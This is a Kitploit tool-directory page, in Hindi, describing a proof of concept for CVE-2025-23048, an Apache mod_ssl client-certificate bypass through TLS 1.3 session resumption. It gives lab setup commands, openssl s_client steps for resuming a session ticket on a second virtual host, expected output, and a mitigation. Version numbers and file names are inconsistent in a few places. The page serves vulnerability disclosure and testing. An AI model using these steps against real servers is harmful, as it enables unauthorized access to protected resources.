Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-23048-POC — Apache HTTP सर्वर संस्करण 2.4.35 – 2.4.63, अलग-अलग `SSLCACertificateFile` निर्देशों वाले वर्चुअल होस्ट्स में TLS 1.3 session resumption उपयोग किए जाने पर क्लाइंट प्रमाणपत्र प्रमाणीकरण बाईपास के प्रति संवेदनशील हैं। | Kitploit
उपकरण/GitHubGitHub/absholi7ly/cve-2025-23048-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubabsholi7ly/cve-2025-23048-poc

CVE-2025-23048-POC

Apache HTTP सर्वर संस्करण 2.4.35 – 2.4.63, अलग-अलग `SSLCACertificateFile` निर्देशों वाले वर्चुअल होस्ट्स में TLS 1.3 session resumption उपयोग किए जाने पर क्लाइंट प्रमाणपत्र प्रमाणीकरण बाईपास के प्रति संवेदनशील हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
410 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-23048: Apache mod_ssl TLS 1.3 सत्र पुनरारंभ क्लाइंट प्रमाणपत्र बायपास

Apache HTTP सर्वर संस्करण 2.4.35 – 2.4.62 क्लाइंट प्रमाणपत्र प्रमाणीकरण बायपास के प्रति संवेदनशील हैं, जब TLS 1.3 सत्र पुनरारंभ का उपयोग विभिन्न SSLCACertificateFile निर्देशों वाले वर्चुअल होस्ट में किया जाता है।

एक हमलावर जिसके पास एक वर्चुअल होस्ट के लिए वैध क्लाइंट प्रमाणपत्र है, वह किसी भिन्न वर्चुअल होस्ट पर TLS 1.3 सत्र को पुनरारंभ कर सकता है, जिसे किसी भिन्न CA द्वारा जारी प्रमाणपत्र की आवश्यकता होती है — जिससे संरक्षित संसाधनों तक अनधिकृत पहुंच प्राप्त होती है।


परीक्षण किया गया वातावरण

  • Apache HTTP सर्वर: 2.4.57 (Win64)
  • ऑपरेटिंग सिस्टम: Windows 10 (64-bit)

सर्वर सेटअप

1. Apache 2.4.57 (Win64) स्थापित करें

root@kitploit:~

Download from: https://www.apachelounge.com/download/VS16/binaries/httpd-2.4.57-win64-VS16.zip

Extract to C:\Apache24

root@kitploit:~

### 2. `conf\httpd.conf` में आवश्यक मॉड्यूल सक्षम करें
```apache
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
LoadModule ssl_module modules/mod_ssl.so

3. SSL सत्र कैश कॉन्फ़िगर करें

root@kitploit:~
SSLSessionCache "shmcb:C:/Apache24/logs/ssl_scache(512000)"
SSLSessionCacheTimeout 300
SSLSessionTickets on

4. SSL निर्देशिका बनाएं और प्रमाणपत्र जनरेट करें

root@kitploit:~
cd C:\Apache24\conf
mkdir ssl
cd ssl

# Server cert (self-signed)
openssl req -x509 -newkey rsa:2048 -keyout server.key -out server.crt -days 365 -nodes -subj "/CN=localhost"

# CA1 and client cert for vhost1
openssl req -x509 -newkey rsa:2048 -keyout ca1.key -out ca1.pem -days 365 -nodes -subj "/CN=CA1"
openssl req -newkey rsa:2048 -keyout client_ca1.key -out client_ca1.csr -nodes -subj "/CN=Client1"
openssl x509 -req -in client_ca1.csr -CA ca1.pem -CAkey ca1.key -CAcreateserial -out client_ca1.crt -days 365

# CA2 for vhost2
openssl req -x509 -newkey rsa:2048 -keyout ca2.key -out ca2.pem -days 365 -nodes -subj "/CN=CA2"

# Cleanup
del client_ca1.csr *.srl

5. वर्चुअल होस्ट कॉन्फ़िगर करें (conf\extra\httpd-vhosts.conf)

root@kitploit:~
<VirtualHost *:443>
    ServerName vhost1.example.com
    DocumentRoot "C:/Apache24/htdocs/vhost1"
    SSLEngine on
    SSLCertificateFile "C:/Apache24/conf/ssl/server.crt"
    SSLCertificateKeyFile "C:/Apache24/conf/ssl/server.key"
    SSLCACertificateFile "C:/Apache24/conf/ssl/ca1.pem"
    SSLVerifyClient optional
    SSLVerifyDepth 1
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 -TLSv1.2
    SSLStrictSNIVHostCheck off

    <Location />
        Require ssl-verify-client
    </Location>
</VirtualHost>

<VirtualHost *:443>
    ServerName vhost2.example.com
    DocumentRoot "C:/Apache24/htdocs/vhost2"
    SSLEngine on
    SSLCertificateFile "C:/Apache24/conf/ssl/server.crt"
    SSLCertificateKeyFile "C:/Apache24/conf/ssl/server.key"
    SSLCACertificateFile "C:/Apache24/conf/ssl/ca2.pem"

    SSLVerifyClient optional_no_ca
    SSLVerifyDepth 1
    SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 -TLSv1.2
    SSLStrictSNIVHostCheck off

    <Location /restricted>
        Require valid-user
    </Location>
</VirtualHost>

6. संरक्षित सामग्री बनाएं

root@kitploit:~
mkdir C:\Apache24\htdocs\vhost1
echo <html><body>Vhost1: Accessible with CA1</body></html> > C:\Apache24\htdocs\vhost1\index.html

mkdir C:\Apache24\htdocs\vhost2\restricted
echo <html><body>Restricted: Vhost2 Secret!</body></html> > C:\Apache24\htdocs\vhost2\restricted\index.html

7. Apache प्रारंभ करें

root@kitploit:~
C:\Apache24\bin>httpd.exe -k install
C:\Apache24\bin>httpd.exe -k start

प्रूफ ऑफ कॉन्सेप्ट

चरण 1: vhost1 के साथ पूर्ण हैंडशेक → सत्र सहेजें

root@kitploit:~
openssl s_client -servername vhost1.example.com -tls1_3 -cert "C:\Apache24\conf\ssl\client_ca1.crt" -key "C:\Apache24\conf\ssl\client_ca1.key" -CAfile "C:\Apache24\conf\ssl\server.crt" -sess_out session_v1.pem 127.0.0.1:443

कनेक्शन के बाद इनपुट:

root@kitploit:~
GET / HTTP/1.1
Host: vhost1.example.com

Apache

अपेक्षित आउटपुट (संक्षिप्त):

root@kitploit:~
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
...
Post-Handshake New Session Ticket arrived:
...
HTTP/1.1 200 OK
...
<html><body>Vhost1: Accessible with CA1</body></html>

सत्र टिकट session_shared.pem में सहेजा गया।


चरण 2: vhost2 पर सत्र पुनरारंभ करें → संरक्षित पथ तक पहुंचें

root@kitploit:~
openssl s_client -servername vhost2.example.com -tls1_3 -CAfile "C:\Apache24\conf\ssl\server.crt" -sess_in session_v1.pem 127.0.0.1:443

इनपुट:

root@kitploit:~
GET /restricted/ HTTP/1.1
Host: vhost2.example.com

अपेक्षित आउटपुट (महत्वपूर्ण):

root@kitploit:~
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Resumption PSK: ...
    TLS session ticket lifetime hint: 300 (seconds)
...
HTTP/1.1 200 OK
...
<html><body>Restricted: Vhost2 Secret!</body></html>

Apache

CA1 से क्लाइंट प्रमाणपत्र को vhost2 पर स्वीकार किया गया (जो केवल CA2 पर भरोसा करता है)
कोई पुनः प्रमाणीकरण नहीं हुआ — सत्र पुनरारंभ ने CA जांच को बायपास कर दिया


शमन

root@kitploit:~
SSLStrictSNIVHostCheck on

सभी TLS 1.3 वर्चुअल होस्ट में जिन्हें अलग-अलग क्लाइंट CA की आवश्यकता होती है।

क्रॉस-SNI सत्र पुनरारंभ को अक्षम करता है — बायपास को रोकता है।


टूल डाउनलोड करें